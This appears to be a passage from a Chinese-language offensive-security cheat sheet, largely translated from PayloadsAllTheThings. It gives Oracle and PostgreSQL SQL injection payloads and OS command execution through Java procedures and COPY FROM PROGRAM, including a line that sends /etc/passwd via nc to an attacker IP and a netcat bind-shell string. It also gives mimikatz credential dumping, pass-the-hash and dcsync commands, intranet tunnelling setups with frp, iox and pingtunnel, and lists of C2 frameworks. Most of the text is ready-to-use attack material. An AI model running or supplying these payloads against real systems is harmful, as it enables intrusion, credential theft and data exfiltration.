Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
SQL Error | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) |
XDBURITYPE getblob | XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob() |
XDBURITYPE getclob | XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob() |
When the injection point is inside a string use : '||PAYLOAD--
Oracle SQL 盲注
Description | Query |
---|---|
Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
Column message exists in table log_table | SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
First letter of first message is t | SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
Oracle SQL 时间注入
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
Oracle SQL 命令执行
Oracle Java Execution
- List Java privileges
sql select * from dba_java_policy select * from user_java_policy
- Grant privileges
sql exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute'); exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
- Execute commands
- 10g R2, 11g R1 and R2:
DBMS_JAVA_TEST.FUNCALL()
sql SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
- 11g R1 and R2:
DBMS_JAVA.RUNJAVA()
sql SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
- 10g R2, 11g R1 and R2:
Oracle Java Class
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/
BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
or (hex encoded)
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
References
注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings
- NetSpi – SQL Wiki
- ASDC12 – New and Improved Hacking Oracle From Web – OWASP
- Pentesting Oracle TNS Listener – HackTricks
- ODAT: Oracle Database Attacking Tool – quentinhardy
- WebSec CheatSheet – Oracle
- New payload to exploit Error-based SQL injection – Oracle database – Mannu Linux – 12/09/2023
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
postgresql
PostgreSQL 命令执行
CVE-2019–9193
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
使用 libc.so.6
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
PostgreSQL 注释
--
/**/
PostgreSQL 链注入点符号
; #用于终止 SQL 命令。在语句中唯一可使用的位置是在字符串常量或引用标识符中。
|| #或语句
# 使用示例:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
PostgreSQL 版本
SELECT version()
PostgreSQL 当前用户
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
PostgreSQL 用户列表
SELECT usename FROM pg_user
PostgreSQL 密码哈希列表
SELECT usename, passwd FROM pg_shadow
查询数据库管理员账户列表
SELECT usename FROM pg_user WHERE usesuper IS TRUE
PostgreSQL 权限列表
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
查询当前用户是否为超级用户
SHOW is_superuser;
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
PostgreSQL 数据库名称
SELECT current_database()
PostgreSQL 数据库列表
SELECT datname FROM pg_database
PostgreSQL 表格列表
SELECT table_name FROM information_schema.tables
PostgreSQL 列表列
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
PostgreSQL 报错注入
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
PostgreSQL XML 帮助器
select query_to_xml('select * from pg_user',true,true,''); -- 返回所有结果作为单个 xml 行
select database_to_xml(true,true,''); -- 将当前数据库转储为 XML
select database_to_xmlschema(true,true,''); -- 将当前数据库转储为 XML 架构
PostgreSQL 盲注
' and substr(version(),1,10) = 'PostgreSQL' and '1' -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1' -> KO
PostgreSQL 时间盲注
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
PostgreSQL 堆叠查询
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
PostgreSQL 文件读取
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
PostgreSQL 文件写入
CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
绕过过滤器
引号
使用 CHR
SELECT CHR(65)||CHR(66)||CHR(67);
使用 $ 符号(适用于 PostgreSQL 8及以上版本)
SELECT $$This is a string$$
SELECT $TAG$This is another string$TAG$
注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings
工具使用命令速查
mimikatz
官方 Github:https://github.com/gentilkiwi/mimikatz
获取登录凭证信息
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
privilege::debug
sekurlsa::logonpasswords
lsass.exe 导出凭据
mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
mimikatz PTH 传递 cmd
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"
mimikatz PTH 传递 mstsc
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"
privilege::debug
sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"
SAM 数据库导出凭据
mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive" "exit"
bat 脚本获取凭据
@echo off
cd /d D:\tools\
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt
导出域内所有用户hash
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit
proxy tools
iox
下载地址:https://github.com/EddieIvan01/iox
proxy
在本地 0.0.0.0:1080启动Socks5服务
./iox proxy -l 1080
加密转发 socks5 代理:
VPS 监听(//将1080端口监听到的流量转发至50054端口):
nohup ./iox proxy -l 50054 -l 1081 -k 3211 > iox.log &
在目标主机执行(//启动代理服务并发送至VPS 50054端口):
./iox proxy -r VPSIP:50054 -k 3211
然后本地socks5代理:socks5://vps:1081
fwd
本地端口转发 3389 至VPS:
vps执行:
nohup ./iox fwd -l *8888 -l 33890 -k 22222
目标机器执行:
iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222
随后连接 VPS:33890 即可访问内网 3389
fuso
Github:https://github.com/editso/fuso
socks
VPS:
./fus
//被控机
./fuc.exe VPSIP 6722 --socks
- linux:i686-unknown-linux-musl.zip
- windows:x86_64-pc-windows-msvc.zip
readme
1. 端口转发
fuc --forward-host xxx.xxx.xxx.xxx --forward-port
--forward-host: 转发到的地址
--forward-port: 转发到的端口
如: 转发流量到内网 10.10.10.4:3389
> fuc --forward-host 10.10.10.4 --forward-port 3389
2. socks5:
fuc --socks --su --s5p xxx --s5u xxx
--su: 可选的, 开启udp转发,
--s5p: 可选的, 认证密码, 默认不进行密码认证
--s5u 可选的, 认证账号, 默认账号 anonymous
--socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp
如: 开启udp转发与密码认证
> fuc --socks --su --s5p 123 --s5u socks
此时, 已开启udp转发,连接密码为 "123",账号为 "socks"
3. 指定穿透成功时访问的端口
fuc -b xxxx
-b | --visit-bind-port: 可选的, 默认随机分配
如: 访问外网端口 8888 转发到内网 80
> fuc --forward-port 80 -b 8888
4. 桥接模式 注意: 目前不能转发udp
fuc --bridge-listen xxxx --bridge-port xxx
--bridge-listen | --bl: 监听地址, 默认 127.0.0.1
--bridge-port | --bp: 监听端口, 默认不启用桥接
如: 开始桥接模式,并监听在9999端口, 本机ip地址为: 10.10.10.2
> fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 开启桥接
> fuc 10.10.10.2 9999 # 建立连接
级联:
> fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 第一级, IP: 10.10.10.2
> fuc --bridge-listen 0.0.0.0 --bridge-port 9991 10.10.10.2 9999 # 第二级, IP: 10.10.10.3
> fuc 10.10.10.3 9991 # 最终
5. 将连接信息通知到 Telegram 或其他
fus --observer "program:[arguments]"
--observer: 建立连接或断开连接时的钩子
如: 使用bash脚本将连接信息通知到tg
> fus --observer "/bin/bash:[telegram.sh]"
6. 指定客户端与服务端通信的端口
fuc --channel-port 8888 ...
--channel-port: 可选的, 客户端与服务端通信端口, 默认随机
pingtunnel+frp 搭 icmp 隧道
pingtunnel 下载:https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6
被控机
nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 >p.log &
nohup ./frpc -c frpc.ini > fff.log &
pingtunnel -l 监听本地的9999端口 -s vps主机IP -t vps主机frp服务端口
客户端frp配置
[common]
server_addr = 127.0.0.1
server_port = 10000
token = PassW0Rd
[zhaoshangju_10078]
type = tcp
remote_port = 10015
plugin = socks5
plugin_user = thIsuserAS
plugin_passwd = Passweqwe0Rm
use_encryption = true
VPS
./pingtunnel -type server
./frps -c frps.ini
本地代理vps的 10015 端口加上密码即可使用icmp隧道。
参考文章:https://www.cnblogs.com/cute-puli/p/15213394.html
FRP
- 将 frps 及 frps.ini 放到具有公网 IP 的机器上。
- 将 frpc 及 frpc.ini 放到处于内网环境的机器上。
- 客户端:frpc -c frpc.ini
- 服务端:frps -c frps.ini
Github:https://github.com/fatedier/frp
代理工具列表
- [2021.03.07] – proxifier 全平台代理工具,支持多种socks协议
- [2021.03.07] – frp 专注于内网穿透的高性能的反向代理应用
- [2021.03.07] – nps 轻量级、高性能、功能强大的内网穿透代理服务器
- [2021.03.07] – iox 端口转发 & 内网代理工具
- [2021.03.07] – Stowaway 面向渗透测试人员的多级代理工具
- [2021.03.07] – rathole Rust 编写的安全、稳定、高性能的内网穿透工具
- [2021.03.07] – rsocx 一款高性能的支持绑定/反向代理的 Socks5 工具
- [2021.03.07] – rakshasa 基于go编写的跨平台、稳定、隐秘的多级代理内网穿透工具
- [2021.03.07] – SwitchyOmega 浏览器的代理插件
- [2021.03.07] – Neo-reGeorg 改进的reGeorg版本
- [2021.03.07] – dns2tcp是一款利用dns协议传输tcp数据的工具
- [2021.03.07] – dnscat2 是一个DNS隧道工具
- [2021.03.07] – ABPTTS 基于ssl加密的http隧道工具
- [2021.03.07] – Termite 内网渗透代理、端口转发工具
- [2021.03.07] – SSTap, 一款利用虚拟网卡在网络层实现的代理工具
- [2021.03.07] – ew 用于开启 SOCKS v5 代理服务的工具(跨平台)
- [2021.03.07] – n2n 开源的点对点穿透工具
- [2021.03.07] – Ecloud 一款基于http/1.1协议传输TCP流量的工具
- [2021.03.07] – icmpsh 一个简单的 reverse ICMP shell
- [2021.03.08] – ngrok 正/反向代理,内网穿透,端口转发
- [2021.03.08] – ssf 全平台的加密隧道 端口转发工具
- [2021.03.14] – proxychains 命令行代理神器
- [2021.03.14] – switcher 一个多功能的端口转发/端口复用工具
- [2021.03.22] – pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具
- [2021.03.26] – chisel – 一款快速稳定的隧道工具
- [2021.03.29] – pystinger – 一款使用webshell进行流量转发的出网工具
- [2021.03.29] – pivotnacci – 通过HTTP代理建立socks连接的工具
- [2021.04.06] – lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具
- [2021.04.14] – Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具
- [2021.05.07] – goproxy 一款轻量级、功能强大、高性能的多种代理工具
- [2021.05.07] – SCFProxy 一个基于腾讯云函数服务的免费代理池
- [2021.06.21] – MOSN 是边缘或服务网格的云原生代理。
- [2021.06.23] – C2ReverseProxy 一款可以在不出网的环境下进行反向代理及cs上线的工具
后渗透工具列表
f8x
一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等
- 项目地址:https://github.com/ffffffff0x/f8x
- 中文文档:https://github.com/ffffffff0x/f8x/blob/main/README.zh-cn.md
Supershell
Supershell C2 远控平台,基于反向SSH隧道获取完全交互式Shell
Viper
互联网攻击面管理&红队模拟平台
Sliver C2
Sliver C2 是一个开源的跨平台红队框架。
Impacket
内网渗透 Python 工具包